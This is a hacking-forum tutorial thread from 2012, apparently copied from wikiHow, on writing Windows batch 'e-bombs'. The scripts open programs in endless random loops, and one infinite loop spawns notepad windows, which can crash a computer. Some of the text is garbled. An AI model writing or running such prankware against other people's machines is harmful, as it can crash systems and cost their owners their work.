![]() |
|
How to make a simple ebomb using note pad.[Edited] - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: How to make a simple ebomb using note pad.[Edited] (/Thread-How-to-make-a-simple-ebomb-using-note-pad-Edited) |
How to make a simple ebomb using note pad.[Edited] - Dead_Punisher - 04-30-2012 As described here, this batch file is annoying but not otherwise harmful. Steps 1. Open up your notepad . 2 Then type in @echo off - this stops the commands appearing on the command prompt . On the next line type cls - This will just clear the command prompt window and tidy it all up a bit. 3 Choose something for your E-bomb to do . If you'd like it to start pinbarogram line, for messages. "echo You're being hacked" minus the quotes makesyou're being hacked pop up in the command prompt window. Put a line under this with the word pause to make it more ableto read. 4 Save it as for example pinball .bat. You should include '.bat ' after you name the file then save it anywhere you want. If it doesn't work click the drop-down when you're saving and put 'all files'. Alternative Method 1. Open notepad, as before, then copy the following This method can use less disk space. Open notepad, as before, then copy the following code Code: @echo offclsbegingoto %random%
:1
start cmd.exe
goto begin
:2
start paint.exe
goto begin
:3
start pinball.exe
goto begin
:4
start iexplore.exegoto begin
:5
start explorer.exegoto begin
:6
start solitaire.exegoto begin
:7
start explorer.exegoto begin
:8
start edit.exegoto begin
:9
start iexplore.exegoto begin
:10
start paint.exegoto begin2. You may notice some of these have been repeated. If you wish to add your own in, go straight ahead. Save this as "anything.bat" . 3. Run it, "IF YOU DARE"!!. It will seemingly randomly open things on the computer. For a bit of fun, try replacing one of the Code: 'start*.exe'parts with the path of a notepad file on the persons computer or something like that, with the following command: Code: edit (path to file) goto beginIt will open their file in a dos based text editor. Try it! Type edit into your run dialog box. What does this mean codes mean? Code: @echo offCode: clsCode: gotoCode: %random% number) These are our flags . We have 10 of them so "%random%" has something to "goto". If we leave one number out, it should close when it gets to that number. Code: start *.exe)Start a program contained in the system32 folder (or SysWOW64 if you're running 64 bit) Tips Experiment with different codes! If you wanted to make this harmful you could put code that deletes files and delete someone’s entire hard drive but I won't say how because some scumbags would do it on his own computer and blame me."no offence" Here's an example of one of the most simple but annoying programs and it's Code: @echo off
:a
start notepad
goto aThe alternative method above is, essentially, the same sort of thingjust more complex. Warnings Don't overdo it. "10" instances of something like pinball is annoying. Hundreds could crash a computer and cause someone to lose work. You could get in trouble for sending a harmful batch file or for tampering with school or public computers. Sending this over the internet to someone who does not want it or loading it onto a public system is illegal. Things You'll Need. Computer running Windows Notepad This thread's credit goes to wikihow RE: How to make a simple ebomb using note pad. - Mnemonic - 04-30-2012 A simple batch Program. you can do open sites by adding command : start www.xxx.com (add more if needed) ( add live chat sites AD .they r irritating) PS Use proper formatting/BBcodes while posting thread to make it more clear .
RE: How to make a simple ebomb using note pad. - TheSkillfularrow - 04-30-2012 yeah, i nice annoying simple batch program. |